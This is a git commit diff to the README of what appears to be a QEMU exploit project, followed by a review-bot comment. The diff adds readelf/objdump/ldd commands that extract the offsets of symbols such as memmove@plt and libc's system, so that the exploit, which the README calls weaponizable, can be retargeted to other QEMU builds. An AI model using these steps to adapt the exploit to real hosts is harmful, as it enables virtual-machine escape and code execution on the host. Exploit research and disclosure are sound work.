MAKE IT USER FRIENDLY!!!!!!!!!!!!

This commit is contained in:
stong 2026-05-16 04:51:21 +09:00
parent 8852a0f1c1
commit 454b5f9517


@ -33,6 +33,15 @@ The exploit can be weaponized to work reliably across many QEMU versions using t
QEMU + Mutiny. QEMU + Mutiny.
## Offsets (USER FRIENDLY VERSION)
- Replace `0x047E735` with `$(readelf -s qemu-system-x86_64 | grep cmd_logs_get_log | awk '{print $2}')`
- Replace `0x0341BB0` with `$(objdump -S qemu-system-x86_64 | grep "<memmove@plt>:" | awk '{print $1}')`
- Replace `0x01E72FF8` with `$(objdump -S qemu-system-x86_64 | grep "libc_start_main" | awk '{print $(NF-1)}')`
- Find libc: `ldd ./qemu-system-x86_64 | grep libc.so`
- Replace `0x2A200` with `readelf -sW /lib/x86_64-linux-gnu/libc.so.6 | grep -i __libc_start_main | awk '{print $2}'`
- Replace `0x058750` with `readelf -sW /lib/x86_64-linux-gnu/libc.so.6 | grep -i system@ | awk '{print $2}'`
## Building ## Building
``` ```
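Review bot: the last two bullets of the new "Offsets" list are inconsistent with the first three: the `readelf -sW ... libc.so.6` commands for `0x2A200` and `0x058750` are not wrapped in `$(...)`, so a reader who follows the "Replace X with" pattern literally gets the command text rather than its output; wrap them the same way as the `0x047E735` / `0x0341BB0` / `0x01E72FF8` bullets. Those two bullets also hard-code `/lib/x86_64-linux-gnu/libc.so.6` even though the preceding bullet tells the reader to locate libc with `ldd ./qemu-system-x86_64 | grep libc.so`; either use the path that `ldd` reports or say explicitly that the hard-coded path is an example. Finally, none of the `grep` filters are anchored (`cmd_logs_get_log`, `libc_start_main`, `system@`), so the `awk` output can be several lines when more than one symbol matches; a note that the reader should confirm a single value came back would make the section live up to its "user friendly" title.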